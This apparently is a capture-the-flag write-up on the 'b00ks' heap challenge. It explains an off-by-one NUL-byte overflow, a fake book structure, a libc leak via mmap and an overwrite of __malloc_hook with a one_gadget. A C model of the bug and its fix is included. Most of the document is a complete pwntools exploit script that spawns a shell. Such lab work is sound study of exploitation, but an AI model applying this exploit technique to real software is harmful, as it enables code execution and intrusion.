off-by-one (b00ks)

Posted by Ff.cheng

Preface

Personal brief notes; the process is not described in detail.

Start debugging in gdb.

vmmap shows the program base address is 0x555555400000.


Continue running and enter the author name (auth).

Searching for the keyword hollk finds the address where auth is stored: 0x555555602040. The circled byte is the overflowing \x00.

Create two books.


Because the pointer to the book structures is stored at off_202010, its address is

0x555555400000 + 0x202010 = 0x555555602010

0x555555602010 holds the address 0x0000555555602060, which is where the addresses of the two books are stored:

book1: 0x0000555555603770  book2: 0x00005555556037a0


If any book is printed at this point, the address of book1 (book1_addr) is printed out together with the author name (auth).


The book structure is laid out as follows:

book_id
book_name
book_desc

The offsets of book2's name and desc relative to book1_addr are:

book2_name - book1_addr = 0x559512b164a8 - 0x559512b16470 = 0x38
book2_desc - book1_addr = 0x559512b164b0 - 0x559512b16470 = 0x40

Changing auth_name again then turns book1_addr from 0x0000559512b16470 into 0x0000559512b16400, and the changed address lands inside book1_desc.

Then print the addresses of book2_name and book2_desc.
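The NUL off-by-one this step relies on, as an added C model that is not the challenge binary's code: a reader that writes its terminator at buf[cap] clobbers the low byte of the pointer stored right after the 32-byte author buffer, turning 0x...70 into 0x...00 as above, while a fixed reader keeps the terminator inside the buffer. The struct layout and both reader functions are assumptions modelled on the addresses in the text, and the byte check assumes a little-endian target.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define NAME_CAP 32

/* Constructed model of the layout described in the writeup: a 32-byte
 * author-name buffer directly followed by the array of book pointers,
 * so the byte at offset 32 is the low byte of the book1 pointer. */
struct layout {
    char author[NAME_CAP];
    uintptr_t books[2];
};

/* Buggy reader (illustrative): copies up to cap bytes, then writes the
 * terminator at buf[i]. When the input fills the buffer, i == cap and
 * the NUL lands one byte past the end. */
static size_t read_name_buggy(char *buf, size_t cap, const char *src, size_t len) {
    size_t i = 0;
    while (i < cap && i < len) { buf[i] = src[i]; i++; }
    buf[i] = '\0';                      /* off-by-one when i == cap */
    return i;
}

/* Fixed reader: reserves the last byte for the terminator, so the NUL
 * always stays inside the buffer and over-long input is truncated. */
static size_t read_name_fixed(char *buf, size_t cap, const char *src, size_t len) {
    size_t i = 0;
    while (i + 1 < cap && i < len) { buf[i] = src[i]; i++; }
    buf[i] = '\0';
    return i;
}

/* Fills the author field with the 32-character name used in the writeup and
 * returns the low byte of books[0] afterwards (little-endian assumed). The
 * write goes through a byte pointer to the whole struct, so the store at
 * offset 32 stays inside one object and is well defined in this model. */
static unsigned low_byte_after_write(int use_fixed) {
    struct layout l;
    const char *name = "hollkaaabbbbbbbbccccccccdddddddd";   /* 32 chars */
    size_t (*rd)(char *, size_t, const char *, size_t) =
        use_fixed ? read_name_fixed : read_name_buggy;
    memset(&l, 0, sizeof l);
    l.books[0] = (uintptr_t)0x555555603770ULL;   /* book1 address from the text */
    rd((char *)&l, NAME_CAP, name, strlen(name));
    return (unsigned)(l.books[0] & 0xff);
}

int main(void) {
    printf("buggy: 0x%02x  fixed: 0x%02x\n", low_byte_after_write(0), low_byte_after_write(1));
    return 0;
}
```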

When the requested memory is large, it is allocated by mmap, and mmap-allocated memory sits at a fixed offset from the libc base; in other words, subtracting that fixed offset from the allocated address gives the libc base.

Then debug to work out the offset from the libc base, and compute __malloc_hook or __free_hook and one_gadget.

Then use fake_book and book2, which write to the same location, to put __malloc_hook or __free_hook and one_gadget in place and get a shell.

exp

from pwn import *
#from LibcSearcher import LibcSearcher
context(os='linux', arch='amd64', log_level='debug')   # 64-bit binary, p64/u64 throughout
context.terminal=['cmd.exe', '/c', 'start', 'wsl.exe']

binary = ELF("b00ks")
libc = ELF("/root/glibc-all-in-one/libs/2.31-0ubuntu9.7_amd64/libc-2.31.so")
r = process("./b00ks")

def createbook(name_size, name, des_size, des):
    # menu 1: create a book (name size, name, description size, description)
    r.recvuntil("> ")
    r.sendline("1")
    r.recvuntil(": ")
    r.sendline(str(name_size))
    r.recvuntil(": ")
    r.sendline(name)
    r.recvuntil(": ")
    r.sendline(str(des_size))
    r.recvuntil(": ")
    r.sendline(des)

def printbook(id):
    # menu 4: list books; returns the fields of the id-th book printed
    r.recvuntil("> ")
    r.sendline("4")
    r.recvuntil(": ")
    for i in range(id):
        book_id = int(r.readline()[:-1])
        r.recvuntil(": ")
        book_name = r.readline()[:-1]
        r.recvuntil(": ")
        book_des = r.readline()[:-1]
        r.recvuntil(": ")
        book_author = r.readline()[:-1]
    return book_id, book_name, book_des, book_author

def createname(name):
    # initial author-name prompt
    r.recvuntil("name: ")
    r.sendline(name)

def changename(name):
    # menu 5: change the author name (triggers the off-by-one NUL write)
    r.recvuntil("> ")
    r.sendline("5")
    r.recvuntil(": ")
    r.sendline(name)

def editbook(book_id,new_des):
    # menu 3: edit a book's description
    r.recvuntil("> ")
    r.sendline("3")
    r.recvuntil(": ")
    r.sendline(str(book_id))
    r.recvuntil(": ")
    r.sendline(new_des)

def deletebook(book_id):
    # menu 2: delete a book
    r.recvuntil("> ")
    r.sendline("2")
    r.recvuntil(": ")
    r.sendline(str(book_id))

# 32-byte name with no room for a terminator
createname("hollkaaabbbbbbbbccccccccdddddddd")

createbook(216, "hollk_boo1", 160, "desc1")
createbook(0x21000, "hollk_boo2", 0x21000, "hollk_desc2")   # large sizes -> served by mmap

# the author name runs straight into the book1 pointer, which is printed after it
book_id_1, book_name, book_des, book_author = printbook(1)
book1_addr = u64(book_author[32:32+6].ljust(8,b'\x00'))
log.success("book1_address:" + hex(book1_addr))

# fake book placed in book1's description where the truncated pointer (LSB 0x00) will land:
# id=1, name ptr -> book2.name field, desc ptr -> book2.desc field, size=0xffff
payload = b'b'*112 + p64(1) + p64(book1_addr + 0x38) + p64(book1_addr+0x40) + p64(0xffff)
editbook(book_id_1,payload)
changename("hollkaaabbbbbbbbccccccccdddddddd")   # NUL byte zeroes the LSB of the book1 pointer

# "book1" is now the fake book; printing it leaks book2's name/desc pointers (mmap region)
book_id_1, book_name, book_des, book_author = printbook(1)
book2_name_addr = u64(book_name.ljust(8,b"\x00"))
book2_des_addr = u64(book_des.ljust(8,b"\x00"))
log.success("book2 name addr:" + hex(book2_name_addr))
log.success("book2 des addr:" + hex(book2_des_addr))

# fixed offset between the mmap'd chunk and the libc base for this environment
libc_base = book2_name_addr + 0x21ff0
log.success("libc base:" + hex(libc_base))

malloc_hook = libc_base + libc.symbols["__malloc_hook"]
one_gadget = libc_base + 0xe3b31 # 0xe3b31 or 0xe3b34 (one_gadget offsets for this libc)
log.success("malloc_hook:" + hex(malloc_hook))
log.success("one_gadget:" + hex(one_gadget))

editbook(1, p64(malloc_hook))   # through the fake book: book2.desc = &__malloc_hook
editbook(2, p64(one_gadget))    # through book2: __malloc_hook = one_gadget

# any allocation now goes through __malloc_hook
createbook(216, "hollk_boo1", 160, "desc1")
r.interactive()

Reference

https://blog.csdn.net/qq_41202237/article/details/108116618